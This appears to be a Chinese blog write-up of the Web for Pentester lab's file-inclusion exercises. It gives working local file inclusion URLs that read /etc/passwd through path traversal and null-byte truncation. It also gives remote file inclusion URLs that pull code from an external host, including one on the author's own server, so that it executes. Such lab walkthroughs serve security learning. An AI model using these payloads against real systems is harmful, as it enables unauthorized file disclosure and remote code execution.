• Web for pentester_writeup之File Include篇


    Web for pentester_writeup之File Include篇

    ##File Include(文件包涵) ###Example 1

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135652230-964502428.png)

    加一个单引号

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135705087-50141791.png)

    从报错中我们可以获取如下信息: 当前文件执行的代码路径: `/var/www/fileincl/example1.php` 文件包含代码引用函数 `include()` 代码引用的文件路径:`include_path`= `/usr/share/php:/usr/share/pear`

    >Payload 1 (本地文件包含LFI) `http://192.168.219.136/fileincl/example1.php?page=../../../../../../../../etc/passwd`

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135803155-2088724461.png)

    Payload 2 (远程文件包含RFI) http://192.168.219.136/fileincl/example1.php?page=https://assets.pentesterlab.com/test_include.txt

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135812288-1016362721.png)

    其中https://assets.pentesterlab.com/test_include.txt是官方给的一个测试例子,也可以自己构建,在txt中写入想执行的代码

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135821873-1400869374.png)

    ###Example 2

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135841490-291369101.png)

    没有后缀名了,同样添加一个单引号查看报错信息

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135915321-2021662260.png)

    发现函数调用的php文件变成了`include(intro'.php)`,我们可以使用%00截断来实现本地文件包含 >Payload 1 (本地文件包含LFI) `http://192.168.219.136/fileincl/example2.php?page=../../../../../../../../etc/passwd%00`

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135944317-1388578621.png)

    Payload 2 (远程文件包含RFI) http://192.168.219.136/fileincl/example2.php?page=https://assets.pentesterlab.com/test_include.txt?blah= 或者使用&blah=当文件路径传参符号为&号时

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135952093-207954802.png)

    Payload 3 (远程文件包含RFI,也可以在主机10.8.0.61自己构造一个phpinfo.php的文件,去掉后缀访问) http://192.168.219.136/fileincl/example2.php?page=http://10.8.0.61/phpinfo

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808135958885-314395672.png)

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808140114651-718114185.png)

  • 相关阅读:
    Node.js
    EFCore-Migrations
    C#核心语法
    C#编程总结--总目录
    PHP ServerPush
    汉字转拼音
    用五分钟重温委托,匿名方法,Lambda,泛型委托,表达式树
    Sublime Text 3 绝对神器
    多线程学习总结
    分享: 利用Readability解决网页正文提取问题
  • 原文地址:https://www.cnblogs.com/liliyuanshangcao/p/11319905.html
Copyright © 2020-2023  润新知